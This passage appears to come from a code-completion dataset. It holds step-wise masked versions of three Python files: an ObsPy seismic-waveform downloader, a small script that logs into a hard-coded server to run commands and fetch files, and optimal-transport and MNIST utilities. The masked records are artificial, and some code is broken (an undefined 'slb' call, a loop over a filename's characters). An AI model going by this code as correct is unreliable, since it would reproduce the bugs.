net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n out_sta_file = glob.glob(os.path.join(out_folder_old, '*%s.%s.%s*' %\n (net_name, sta_name, chan_name)))\n if len(out_sta_file) == 0:\n s += 'WIN {} {} {} {}/{}/{},00:00:00 +1d \\n'.format(net_name,\n sta_name, chan_name, year, month, day)\n s += 'quit \\n'\n p.communicate(s.encode())\n out_files = glob.glob('%s%s%s*.*' % (year, month, day))\n for 
out_file in out_files:\n shutil.move(out_file, out_folder)\n te = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(te - tb) + '\\n')\n\n\ndef stp_download_parallel(startday, endday, sta_file, out_path, cores=1):\n \"\"\"\n\n :param startday: obspy.core.utcdatetime.UTCDateTime\n :param endday: obspy.core.utcdatetime.UTCDateTime\n :param sta_file: Network,Station,Channel,Latitude,Longitude\n :param out_path:\n :param cores:\n :return:\n \"\"\"\n if os.path.exists('download.log'):\n os.remove('download.log')\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n pool = multiprocessing.Pool(processes=cores)\n tasks = []\n day = startday\n while day <= endday:\n print(day)\n stp_run_download(sta_list, day, out_path)\n day = day + 86400\n '\\n # chunksize is how many tasks will be processed by one processor\\n rs = pool.starmap_async(stp_run_download, tasks, chunksize=1)\\n # close() & join() is necessary\\n # No more work\\n pool.close()\\n\\n # simple progress bar\\n while (True):\\n remaining = rs._number_left\\n print(\"finished:{0}/{1}\".format(len(tasks) - remaining, len(tasks)),\\n end=\\'\\r\\') # \\'\\r\\' means remove the last line\\n if (rs.ready()):\\n break\\n time.sleep(0.5)\\n\\n # Wait for completion\\n pool.join()\\n '\n return None\n\n\nif __name__ == '__main__':\n LOCAL_PATH = (\n '/Users/yunnaidan/Project/Dynamic_Triggering/Workspace/Central_California'\n )\n REMOTE_PATH = '/home/yunnd/Workspace/Dynamic_triggering/Central_California'\n if platform.system() == 'Darwin':\n ROOT_PATH = LOCAL_PATH\n if platform.system() == 'Linux':\n ROOT_PATH = REMOTE_PATH\n startday = UTCDateTime('2009-01-03')\n endday = UTCDateTime('2009-01-05')\n sta_file = os.path.join(ROOT_PATH,\n 'data/station_info/stations_CI_selected_for_download_BH.txt')\n out_path = os.path.join(ROOT_PATH, 'data/time_series/raw_data/mseed')\n data_center = 'SCEDC'\n obspy_download_parallel(data_center, startday, endday, sta_file,\n out_path, cores=1)\n pass\n",
"step-5": "\"\"\"\n@version:\nauthor:yunnaidan\n@time: 2019/07/22\n@file: download_mseed.py\n@function:\n\"\"\"\nfrom obspy.clients.fdsn import Client\nfrom obspy.core import UTCDateTime\nimport numpy as np\nimport obspy\nimport os\nimport re\nimport time\nimport glob\nimport shutil\nimport platform\nimport subprocess\nimport multiprocessing\n\n\ndef load_stations(filename):\n with open(filename, 'r') as f:\n sta_data = f.readlines()\n sta_list = []\n for l in range(1, len(sta_data)):\n sta_info = sta_data[l]\n net_name = re.split(',', sta_info)[0]\n sta_name = re.split(',', sta_info)[1]\n chan_name = re.split(',', sta_info)[2]\n sta_list.append([net_name, sta_name, chan_name])\n\n return sta_list\n\n\ndef set_folders(out_path, startday, endday):\n day = startday\n while day <= endday:\n year_folder = str(day.year).zfill(4)\n day_folder = str(day.year).zfill(\n 4) + str(day.month).zfill(2) + str(day.day).zfill(2)\n out_folder = os.path.join(out_path, year_folder, day_folder)\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n\n day = day + 86400\n\n return None\n\n\ndef obspy_download(\n client,\n net_name,\n sta_name,\n chn_name,\n starttime,\n endtime,\n out_path,\n time_thre=10):\n year_folder = str(starttime.year)\n day_folder = str(starttime.year).zfill(\n 4) + str(starttime.month).zfill(2) + str(starttime.day).zfill(2)\n out_folder = os.path.join(out_path, year_folder, day_folder)\n\n outfile = os.path.join(\n out_folder, net_name + '.' + sta_name + '.' + chn_name + '.mseed')\n # Incremental download\n if not os.path.exists(outfile):\n t = 0\n flag = False\n while flag == False and t < time_thre:\n try:\n client.get_waveforms(\n network=net_name,\n station=sta_name,\n location='--',\n channel=chn_name,\n starttime=starttime,\n endtime=endtime,\n filename=outfile)\n flag = True\n except BaseException:\n pass\n time.sleep(0.5)\n t += 1\n\n if not flag:\n with open('download.log', 'a') as f:\n f.write('No data: ' + outfile + '\\n')\n\n return None\n\n\ndef obspy_download_parallel(\n data_center,\n startday,\n endday,\n sta_file,\n out_path,\n cores=1):\n\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n f.write('The number of stations is: ' + str(len(sta_list)) + '\\n')\n\n day = startday\n while day <= endday:\n t_b = time.time()\n with open('download.log', 'a') as f:\n f.write('Day: ' + str(day) + '\\n')\n print(day)\n starttime = day\n endtime = day + 86400\n\n client = Client(data_center)\n\n if cores == 1:\n for i in range(len(sta_list)):\n sta = sta_list[i]\n print (sta)\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n obspy_download(\n client,\n net_name,\n sta_name,\n chan_name,\n starttime,\n endtime,\n out_path)\n else:\n pass\n\n t_e = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(t_e - t_b) + '\\n')\n day = day + 86400\n\n return None\n\n\ndef stp_run_download(sta_list, download_date, out_path):\n with open('download.log', 'a') as f:\n f.write(str(download_date) + '\\n')\n\n tb = time.time()\n year = str(download_date.year).zfill(4)\n month = str(download_date.month).zfill(2)\n day = str(download_date.day).zfill(2)\n day_folder = year + month + day\n out_folder = os.path.join(out_path, year, day_folder)\n\n out_folder_old = os.path.join(out_path + '_old', year, day_folder)\n\n p = subprocess.Popen(['stp'], stdin=subprocess.PIPE)\n s = \"MSEED \\n\"\n\n for i in 
range(len(sta_list)):\n\n sta = sta_list[i]\n net_name = sta[0]\n sta_name = sta[1]\n chan_name = sta[2]\n\n out_sta_file = glob.glob(\n os.path.join(\n out_folder_old, '*%s.%s.%s*' %\n (net_name, sta_name, chan_name)))\n\n if len(out_sta_file) == 0:\n s += \"WIN {} {} {} {}/{}/{},00:00:00 +1d \\n\".format(\n net_name, sta_name, chan_name, year, month, day)\n\n s += \"quit \\n\"\n p.communicate(s.encode())\n\n out_files = glob.glob('%s%s%s*.*' % (year, month, day))\n for out_file in out_files:\n shutil.move(out_file, out_folder)\n\n te = time.time()\n with open('download.log', 'a') as f:\n f.write('Using time: ' + str(te - tb) + '\\n')\n\n\ndef stp_download_parallel(startday, endday, sta_file, out_path, cores=1):\n '''\n\n :param startday: obspy.core.utcdatetime.UTCDateTime\n :param endday: obspy.core.utcdatetime.UTCDateTime\n :param sta_file: Network,Station,Channel,Latitude,Longitude\n :param out_path:\n :param cores:\n :return:\n '''\n if os.path.exists('download.log'):\n os.remove('download.log')\n with open('download.log', 'a') as f:\n f.write('>>> ' + str(time.localtime(time.time())) + '\\n')\n\n set_folders(out_path, startday, endday)\n sta_list = load_stations(sta_file)\n\n pool = multiprocessing.Pool(processes=cores)\n tasks = []\n\n day = startday\n while day <= endday:\n print(day)\n # tasks.append((sta_list, day, out_path))\n stp_run_download(sta_list, day, out_path)\n day = day + 86400\n\n '''\n # chunksize is how many tasks will be processed by one processor\n rs = pool.starmap_async(stp_run_download, tasks, chunksize=1)\n # close() & join() is necessary\n # No more work\n pool.close()\n\n # simple progress bar\n while (True):\n remaining = rs._number_left\n print(\"finished:{0}/{1}\".format(len(tasks) - remaining, len(tasks)),\n end='\\r') # '\\r' means remove the last line\n if (rs.ready()):\n break\n time.sleep(0.5)\n\n # Wait for completion\n pool.join()\n '''\n\n return None\n\n\nif __name__ == '__main__':\n LOCAL_PATH = '/Users/yunnaidan/Project/Dynamic_Triggering/Workspace/Central_California'\n REMOTE_PATH = '/home/yunnd/Workspace/Dynamic_triggering/Central_California'\n if platform.system() == 'Darwin':\n ROOT_PATH = LOCAL_PATH\n if platform.system() == 'Linux':\n ROOT_PATH = REMOTE_PATH\n\n startday = UTCDateTime('2009-01-03')\n endday = UTCDateTime('2009-01-05')\n\n sta_file = os.path.join(\n ROOT_PATH,\n 'data/station_info/stations_CI_selected_for_download_BH.txt')\n\n out_path = os.path.join(ROOT_PATH, 'data/time_series/raw_data/mseed')\n data_center = 'SCEDC'\n obspy_download_parallel(\n data_center,\n startday,\n endday,\n sta_file,\n out_path,\n cores=1)\n # stp_download_parallel(startday, endday, sta_file, out_path, cores=15)\n\n pass\n",
"step-ids": [
3,
5,
6,
7,
9
]
}
|
[
3,
5,
6,
7,
9
] |
from connection import Machine
from credentials import get_credentials
targets = ['45.32.13.245']
#targets = ['localhost']
input_file = 'cmd'
def main():
global targets
username, password = get_credentials('laozi')
remote_host = Machine(username, password)
for target in targets:
remote_host.connect(target)
stdin, stdout = remote_host.create_channel(target, input_file)
        # push the commands listed in input_file through the channel
        # (slb is assumed to be an external helper module providing send_cmd)
        slb.send_cmd(stdin, stdout, input_file)
        remote_dir = input('Which directory should I list? ')
        remote_host.list_content(remote_dir)
        remote_file = input('Which file should I retrieve? ')
        remote_host.retrieve(remote_dir, remote_file)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "18bc8a8b1cbb544cfbe581e32ee5e509d67beafd",
"index": 1410,
"step-1": "<mask token>\n\n\ndef main():\n global targets\n username, password = get_credentials('laozi')\n remote_host = Machine(username, password)\n for target in targets:\n remote_host.connect(target)\n stdin, stdout = remote_host.create_channel(target, input_file)\n slb.send_cmd(stdin, stdout, input_file)\n remote_dir = input('Which directory should I list?')\n remote_host.list_content(remote_dir)\n remote_file = input('Which file should I retrieve?')\n for f in remote_file:\n remote_host.retrieve(remote_dir, remote_file)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n global targets\n username, password = get_credentials('laozi')\n remote_host = Machine(username, password)\n for target in targets:\n remote_host.connect(target)\n stdin, stdout = remote_host.create_channel(target, input_file)\n slb.send_cmd(stdin, stdout, input_file)\n remote_dir = input('Which directory should I list?')\n remote_host.list_content(remote_dir)\n remote_file = input('Which file should I retrieve?')\n for f in remote_file:\n remote_host.retrieve(remote_dir, remote_file)\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\ntargets = ['45.32.13.245']\ninput_file = 'cmd'\n\n\ndef main():\n global targets\n username, password = get_credentials('laozi')\n remote_host = Machine(username, password)\n for target in targets:\n remote_host.connect(target)\n stdin, stdout = remote_host.create_channel(target, input_file)\n slb.send_cmd(stdin, stdout, input_file)\n remote_dir = input('Which directory should I list?')\n remote_host.list_content(remote_dir)\n remote_file = input('Which file should I retrieve?')\n for f in remote_file:\n remote_host.retrieve(remote_dir, remote_file)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from connection import Machine\nfrom credentials import get_credentials\ntargets = ['45.32.13.245']\ninput_file = 'cmd'\n\n\ndef main():\n global targets\n username, password = get_credentials('laozi')\n remote_host = Machine(username, password)\n for target in targets:\n remote_host.connect(target)\n stdin, stdout = remote_host.create_channel(target, input_file)\n slb.send_cmd(stdin, stdout, input_file)\n remote_dir = input('Which directory should I list?')\n remote_host.list_content(remote_dir)\n remote_file = input('Which file should I retrieve?')\n for f in remote_file:\n remote_host.retrieve(remote_dir, remote_file)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from connection import Machine\nfrom credentials import get_credentials\n\ntargets = ['45.32.13.245']\n#targets = ['localhost']\ninput_file = 'cmd'\n\ndef main():\n global targets\n username, password = get_credentials('laozi')\n remote_host = Machine(username, password)\n for target in targets:\n remote_host.connect(target)\n stdin, stdout = remote_host.create_channel(target, input_file)\n slb.send_cmd(stdin, stdout, input_file)\n remote_dir = input('Which directory should I list?')\n remote_host.list_content(remote_dir)\n remote_file = input('Which file should I retrieve?')\n for f in remote_file:\n remote_host.retrieve(remote_dir, remote_file)\n\nif __name__ == '__main__':\n main()\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from __future__ import print_function
import ot
import torch
import numpy as np
from sklearn.neighbors import KernelDensity
from torch.utils.data import Dataset
import jacinle.io as io
import optimal_transport_modules.pytorch_utils as PTU
import optimal_transport_modules.generate_data as g_data
from optimal_transport_modules.record_mean_cov import select_mean_and_cov
'''
PyTorch type
'''
def kde_Gaussian_fitting(miu, bandwidth):
kde_analyzer = KernelDensity(
kernel='gaussian', bandwidth=bandwidth).fit(miu)
return kde_analyzer
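# Illustrative usage sketch (the sample arrays below are placeholders):
#   kde = kde_Gaussian_fitting(samples_n_d, bandwidth=0.1)
#   log_density = kde.score_samples(query_n_d)   # sklearn KernelDensity API
#   new_points = kde.sample(n_samples=100)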
def second_moment_no_average(batch_dim):
return batch_dim.pow(2).sum(dim=1)
def second_moment_single_dist(batch_dim):
return batch_dim.pow(2).sum(dim=1).mean()
def second_moment_all_dist(batch_dim_dist):
return batch_dim_dist.pow(2).sum(dim=1).mean(dim=0)
def inprod_average(batch_dim_1, batch_dim_2):
assert batch_dim_1.shape[0] == batch_dim_2.shape[0]
batch_size = batch_dim_1.shape[0]
inner_product_avg = torch.dot(batch_dim_1.reshape(-1),
batch_dim_2.reshape(-1)) / batch_size
return inner_product_avg
def inprod(batch_dim_1, batch_dim_2):
    inner_product = torch.dot(batch_dim_1.reshape(-1),
                              batch_dim_2.reshape(-1))
    return inner_product
def grad_of_function(input_samples, network):
g_of_y = network(input_samples).sum()
gradient = torch.autograd.grad(
g_of_y, input_samples, create_graph=True)[0]
return gradient
def two_loop_loss_in_W2(convex_f_list, grad_g_of_y, miu_i, dist_weight, idx_dist):
n_dist = dist_weight.shape[0]
#! The 2nd loss part useful for f/g parameters
f_grad_g_y = convex_f_list[idx_dist](grad_g_of_y).mean()
#! The 4th loss part useful for f/g parameters
for j in range(n_dist):
f_grad_g_y -= dist_weight[j] * convex_f_list[j](grad_g_of_y).mean()
#! The 1st loss part useful for g parameters
inner_product = inprod_average(grad_g_of_y, miu_i)
#! The 3rd loss part useful for g parameters
half_moment_grad_of_g = 0.5 * second_moment_single_dist(grad_g_of_y)
loss_gi = (f_grad_g_y - inner_product +
half_moment_grad_of_g) * dist_weight[idx_dist]
return loss_gi
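# Restating the loss assembled above in symbols (batch means play the role of E[.]):
#   L_i = w_i * ( E[f_i(grad_g(y))] - sum_j w_j * E[f_j(grad_g(y))]
#                 - <grad_g(y), mu_i>_avg + 0.5 * E[ ||grad_g(y)||^2 ] )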
'''
localized POT library
'''
def w2_distance_samples_solver(sample1_n_d, sample2_n_d):
# see here for details
# https://pythonot.github.io/all.html#ot.emd
# https://pythonot.github.io/all.html#ot.emd2
assert sample1_n_d.shape == sample2_n_d.shape
num_sample = sample1_n_d.shape[0]
a = np.ones([num_sample]) / num_sample
b = np.ones([num_sample]) / num_sample
tmp_marginal_1 = np.expand_dims(sample1_n_d, axis=0)
tmp_marginal_2 = np.expand_dims(sample2_n_d, axis=1)
M = tmp_marginal_1 - tmp_marginal_2
M = np.sum(np.abs(M)**2, axis=2)
return ot.emd2(a, b, M)
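# Illustrative usage sketch (random clouds are placeholders): returns the squared
# 2-Wasserstein cost between two equally weighted empirical measures.
#   xs = np.random.randn(500, 2)
#   xt = np.random.randn(500, 2) + 5.0
#   w2_sq = w2_distance_samples_solver(xs, xt)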
def free_support_barycenter(measures_locations, measures_weights, X_init, b=None, weights=None, numItermax=100, stopThr=1e-7, use_sinkhorn=False):
g_sinkhorn_reg = 0.1
iter_count = 0
N = len(measures_locations)
k = X_init.shape[0]
d = X_init.shape[1]
if b is None:
b = np.ones((k,)) / k
if weights is None:
weights = np.ones((N,)) / N
X = X_init
log_dict = {}
displacement_square_norm = stopThr + 1.
while (displacement_square_norm > stopThr and iter_count < numItermax):
T_sum = np.zeros((k, d))
for (measure_locations_i, measure_weights_i, weight_i) in zip(measures_locations, measures_weights, weights.tolist()):
M_i = ot.dist(X, measure_locations_i)
if use_sinkhorn:
T_i = ot.bregman.sinkhorn(
b, measure_weights_i, M_i, g_sinkhorn_reg)
else:
T_i = ot.emd(b, measure_weights_i, M_i)
T_sum = T_sum + weight_i * \
np.reshape(1. / b, (-1, 1)) * \
np.matmul(T_i, measure_locations_i)
displacement_square_norm = np.sum(np.square(T_sum - X))
X = T_sum
        print('iteration %d, displacement_square_norm=%f' %
              (iter_count, displacement_square_norm))
iter_count += 1
return X
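# Illustrative usage sketch (all arrays are placeholders): the support X_init is
# iteratively pushed toward the barycenter of the input empirical measures.
#   locs = [np.random.randn(200, 2), np.random.randn(300, 2) + 3.0]
#   wts = [np.ones(200) / 200, np.ones(300) / 300]
#   bary_support = free_support_barycenter(locs, wts, np.random.randn(100, 2), numItermax=50)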
'''
MNIST utils
'''
class ReshapeTransform:
def __init__(self, new_size):
self.new_size = new_size
def __call__(self, img):
return torch.reshape(img, self.new_size)
# def extract_three_number(total_data):
# idx_train = (total_data.targets == 0) + (total_data.targets ==
# 1) + (total_data.targets == 7)
# total_data.targets = total_data.targets[idx_train]
# total_data.data = total_data.data[idx_train]
# return total_data
class CustomMnistDataset(Dataset):
def __init__(self, data, target, transform=None):
self.data = data
self.target = target
self.transform = transform
def __len__(self):
assert len(self.target) == len(self.data)
return len(self.target)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
data_idxed = self.data[idx]
target_idxed = self.target[idx].float()
# sample = {'data': data_idxed, 'target': target_idxed}
if self.transform:
data_idxed = self.transform(data_idxed)
return [data_idxed, target_idxed]
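# Illustrative usage sketch (tensors are placeholders): wrap pre-loaded digit
# tensors so a DataLoader yields flattened images with float targets.
#   from torch.utils.data import DataLoader
#   images, labels = torch.rand(100, 28, 28), torch.randint(0, 2, (100,))
#   dataset = CustomMnistDataset(images, labels, transform=ReshapeTransform((-1,)))
#   loader = DataLoader(dataset, batch_size=16, shuffle=True)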
'''
Gaussian utils
'''
def get_gmm_param(trial, cond=-1):
if cond > 0:
MEAN, COV = select_mean_and_cov(trial, range_cond=cond)
else:
MEAN, COV = select_mean_and_cov(trial)
INPUT_DIM = MEAN[0].shape[1]
OUTPUT_DIM = INPUT_DIM
NUM_DISTRIBUTION = len(MEAN)
NUM_GMM_COMPONENT = []
for i in range(NUM_DISTRIBUTION):
NUM_GMM_COMPONENT.append(MEAN[i].shape[0])
high_dim_flag = INPUT_DIM > 2
return MEAN, COV, INPUT_DIM, OUTPUT_DIM, NUM_DISTRIBUTION, NUM_GMM_COMPONENT, high_dim_flag
'''
Average the 2 layer neural networks
'''
def average_nn(args, **kwargs):
averaged_parameters = np.zeros([args.N_SAMPLES, args.INPUT_DIM])
tmp_data = averaged_parameters
n_samp_of_subset = int(args.N_SAMPLES / args.NUM_DISTRIBUTION)
for i in range(args.NUM_DISTRIBUTION):
model_param = io.load(args.get_nn(**kwargs) +
f"/subset_{i+1}_samples_{args.subset_samples}/trial_26/storing_models/nn_2layer_epoch200.pt")
assert args.N_SAMPLES == model_param['layer1.weight'].shape[0]
        tmp_data[:, :-1] = PTU.torch2numpy(model_param['layer1.weight'])
        tmp_data[:, -1] = PTU.torch2numpy(model_param['last_layer.weight'].squeeze())
        if i == args.NUM_DISTRIBUTION - 1:
            averaged_parameters[i * n_samp_of_subset:] = \
                tmp_data[i * n_samp_of_subset:]
        else:
            averaged_parameters[i * n_samp_of_subset:(i + 1) * n_samp_of_subset] = \
                tmp_data[i * n_samp_of_subset:(i + 1) * n_samp_of_subset]
return averaged_parameters
'''
get marginal data handle
'''
def get_marginal_list(cfg, type_data='2block'):
if type_data == '2block':
marginal_data = g_data.marginal_data_blocks_3loop_ficnn(
cfg)[:, :, :-1]
elif type_data == 'circ_squa':
marginal_data = g_data.marginal_data_circ_squ_3loop_ficnn(
cfg)[:, :, :-1]
elif type_data == 'mnist0-1':
marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(
cfg)
elif type_data == '3digit':
marginal_data = g_data.marginal_data_3digit_3loop_ficnn(
cfg)[:, :, :-1]
elif type_data == 'ellipse':
marginal_data = g_data.marginal_data_ellipse_3loop_ficnn(
cfg)[:, :, :-1]
elif type_data == 'line':
marginal_data = g_data.marginal_data_line_3loop_ficnn(
cfg)[:, :, :-1]
elif type_data == 'usps_mnist':
marginal_data = g_data.marginal_usps_3loop_ficnn_handle(
cfg)[0][torch.randperm(5000), :, :-1]
elif type_data == 'mnist_group':
if cfg.N_TEST == 25:
idx_digit = torch.zeros(25).long()
for idx in range(5):
idx_digit[idx * 5:(idx + 1) * 5] = 5000 * idx + torch.arange(5)
marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(
cfg)[idx_digit]
else:
marginal_data = g_data.marginal_mnist_3loop_ficnn_handle(
cfg)[torch.randperm(25000)]
elif type_data == 'cifar':
marginal_data = g_data.marginal_cifar_handle(cfg)
elif type_data == 'gmm':
marginal_data = g_data.marginal_data_gmm_3loop_ficnn(
cfg)[:, :, :-1]
return marginal_data.permute(2, 0, 1)
|
normal
|
{
"blob_id": "0ee902d59d3d01b6ec8bb4cc8d5e8aa583644397",
"index": 1298,
"step-1": "<mask token>\n\n\ndef kde_Gaussian_fitting(miu, bandwidth):\n kde_analyzer = KernelDensity(kernel='gaussian', bandwidth=bandwidth).fit(\n miu)\n return kde_analyzer\n\n\n<mask token>\n\n\ndef second_moment_all_dist(batch_dim_dist):\n return batch_dim_dist.pow(2).sum(dim=1).mean(dim=0)\n\n\ndef inprod_average(batch_dim_1, batch_dim_2):\n assert batch_dim_1.shape[0] == batch_dim_2.shape[0]\n batch_size = batch_dim_1.shape[0]\n inner_product_avg = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.\n reshape(-1)) / batch_size\n return inner_product_avg\n\n\ndef inprod(batch_dim_1, batch_dim_2):\n innner_product = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.reshape(-1)\n )\n return innner_product\n\n\n<mask token>\n\n\ndef w2_distance_samples_solver(sample1_n_d, sample2_n_d):\n assert sample1_n_d.shape == sample2_n_d.shape\n num_sample = sample1_n_d.shape[0]\n a = np.ones([num_sample]) / num_sample\n b = np.ones([num_sample]) / num_sample\n tmp_marginal_1 = np.expand_dims(sample1_n_d, axis=0)\n tmp_marginal_2 = np.expand_dims(sample2_n_d, axis=1)\n M = tmp_marginal_1 - tmp_marginal_2\n M = np.sum(np.abs(M) ** 2, axis=2)\n return ot.emd2(a, b, M)\n\n\n<mask token>\n\n\nclass ReshapeTransform:\n\n def __init__(self, new_size):\n self.new_size = new_size\n\n def __call__(self, img):\n return torch.reshape(img, self.new_size)\n\n\nclass CustomMnistDataset(Dataset):\n\n def __init__(self, data, target, transform=None):\n self.data = data\n self.target = target\n self.transform = transform\n\n def __len__(self):\n assert len(self.target) == len(self.data)\n return len(self.target)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n data_idxed = self.data[idx]\n target_idxed = self.target[idx].float()\n if self.transform:\n data_idxed = self.transform(data_idxed)\n return [data_idxed, target_idxed]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef kde_Gaussian_fitting(miu, bandwidth):\n kde_analyzer = KernelDensity(kernel='gaussian', bandwidth=bandwidth).fit(\n miu)\n return kde_analyzer\n\n\n<mask token>\n\n\ndef second_moment_all_dist(batch_dim_dist):\n return batch_dim_dist.pow(2).sum(dim=1).mean(dim=0)\n\n\ndef inprod_average(batch_dim_1, batch_dim_2):\n assert batch_dim_1.shape[0] == batch_dim_2.shape[0]\n batch_size = batch_dim_1.shape[0]\n inner_product_avg = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.\n reshape(-1)) / batch_size\n return inner_product_avg\n\n\ndef inprod(batch_dim_1, batch_dim_2):\n innner_product = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.reshape(-1)\n )\n return innner_product\n\n\ndef grad_of_function(input_samples, network):\n g_of_y = network(input_samples).sum()\n gradient = torch.autograd.grad(g_of_y, input_samples, create_graph=True)[0]\n return gradient\n\n\n<mask token>\n\n\ndef w2_distance_samples_solver(sample1_n_d, sample2_n_d):\n assert sample1_n_d.shape == sample2_n_d.shape\n num_sample = sample1_n_d.shape[0]\n a = np.ones([num_sample]) / num_sample\n b = np.ones([num_sample]) / num_sample\n tmp_marginal_1 = np.expand_dims(sample1_n_d, axis=0)\n tmp_marginal_2 = np.expand_dims(sample2_n_d, axis=1)\n M = tmp_marginal_1 - tmp_marginal_2\n M = np.sum(np.abs(M) ** 2, axis=2)\n return ot.emd2(a, b, M)\n\n\n<mask token>\n\n\nclass ReshapeTransform:\n\n def __init__(self, new_size):\n self.new_size = new_size\n\n def __call__(self, img):\n return torch.reshape(img, self.new_size)\n\n\nclass CustomMnistDataset(Dataset):\n\n def __init__(self, data, target, transform=None):\n self.data = data\n self.target = target\n self.transform = transform\n\n def __len__(self):\n assert len(self.target) == len(self.data)\n return len(self.target)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n data_idxed = self.data[idx]\n target_idxed = self.target[idx].float()\n if self.transform:\n data_idxed = self.transform(data_idxed)\n return [data_idxed, target_idxed]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef kde_Gaussian_fitting(miu, bandwidth):\n kde_analyzer = KernelDensity(kernel='gaussian', bandwidth=bandwidth).fit(\n miu)\n return kde_analyzer\n\n\n<mask token>\n\n\ndef second_moment_single_dist(batch_dim):\n return batch_dim.pow(2).sum(dim=1).mean()\n\n\ndef second_moment_all_dist(batch_dim_dist):\n return batch_dim_dist.pow(2).sum(dim=1).mean(dim=0)\n\n\ndef inprod_average(batch_dim_1, batch_dim_2):\n assert batch_dim_1.shape[0] == batch_dim_2.shape[0]\n batch_size = batch_dim_1.shape[0]\n inner_product_avg = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.\n reshape(-1)) / batch_size\n return inner_product_avg\n\n\ndef inprod(batch_dim_1, batch_dim_2):\n innner_product = torch.dot(batch_dim_1.reshape(-1), batch_dim_2.reshape(-1)\n )\n return innner_product\n\n\ndef grad_of_function(input_samples, network):\n g_of_y = network(input_samples).sum()\n gradient = torch.autograd.grad(g_of_y, input_samples, create_graph=True)[0]\n return gradient\n\n\ndef two_loop_loss_in_W2(convex_f_list, grad_g_of_y, miu_i, dist_weight,\n idx_dist):\n n_dist = dist_weight.shape[0]\n f_grad_g_y = convex_f_list[idx_dist](grad_g_of_y).mean()\n for j in range(n_dist):\n f_grad_g_y -= dist_weight[j] * convex_f_list[j](grad_g_of_y).mean()\n inner_product = inprod_average(grad_g_of_y, miu_i)\n half_moment_grad_of_g = 0.5 * second_moment_single_dist(grad_g_of_y)\n loss_gi = (f_grad_g_y - inner_product + half_moment_grad_of_g\n ) * dist_weight[idx_dist]\n return loss_gi\n\n\n<mask token>\n\n\ndef w2_distance_samples_solver(sample1_n_d, sample2_n_d):\n assert sample1_n_d.shape == sample2_n_d.shape\n num_sample = sample1_n_d.shape[0]\n a = np.ones([num_sample]) / num_sample\n b = np.ones([num_sample]) / num_sample\n tmp_marginal_1 = np.expand_dims(sample1_n_d, axis=0)\n tmp_marginal_2 = np.expand_dims(sample2_n_d, axis=1)\n M = tmp_marginal_1 - tmp_marginal_2\n M = np.sum(np.abs(M) ** 2, axis=2)\n return ot.emd2(a, b, M)\n\n\n<mask token>\n\n\nclass ReshapeTransform:\n\n def __init__(self, new_size):\n self.new_size = new_size\n\n def __call__(self, img):\n return torch.reshape(img, self.new_size)\n\n\nclass CustomMnistDataset(Dataset):\n\n def __init__(self, data, target, transform=None):\n self.data = data\n self.target = target\n self.transform = transform\n\n def __len__(self):\n assert len(self.target) == len(self.data)\n return len(self.target)\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n data_idxed = self.data[idx]\n target_idxed = self.target[idx].float()\n if self.transform:\n data_idxed = self.transform(data_idxed)\n return [data_idxed, target_idxed]\n\n\n<mask token>\n\n\ndef average_nn(args, **kwargs):\n averaged_parameters = np.zeros([args.N_SAMPLES, args.INPUT_DIM])\n tmp_data = averaged_parameters\n n_samp_of_subset = int(args.N_SAMPLES / args.NUM_DISTRIBUTION)\n for i in range(args.NUM_DISTRIBUTION):\n model_param = io.load(args.get_nn(**kwargs) +\n f'/subset_{i + 1}_samples_{args.subset_samples}/trial_26/storing_models/nn_2layer_epoch200.pt'\n )\n assert args.N_SAMPLES == model_param['layer1.weight'].shape[0]\n tmp_data[:, :-1] = PTU.torch2numpy(model_param['layer1.weight'])\n tmp_data[:, -1] = PTU.torch2numpy(model_param['last_layer.weight'].\n squeeze())\n if i == args.NUM_DISTRIBUTION - 1:\n averaged_parameters[i * n_samp_of_subset:] = tmp_data[i *\n n_samp_of_subset:]\n else:\n averaged_parameters[i * n_samp_of_subset:(i + 1) * n_samp_of_subset\n ] = tmp_data[i * n_samp_of_subset:(i + 1) * n_samp_of_subset]\n return 
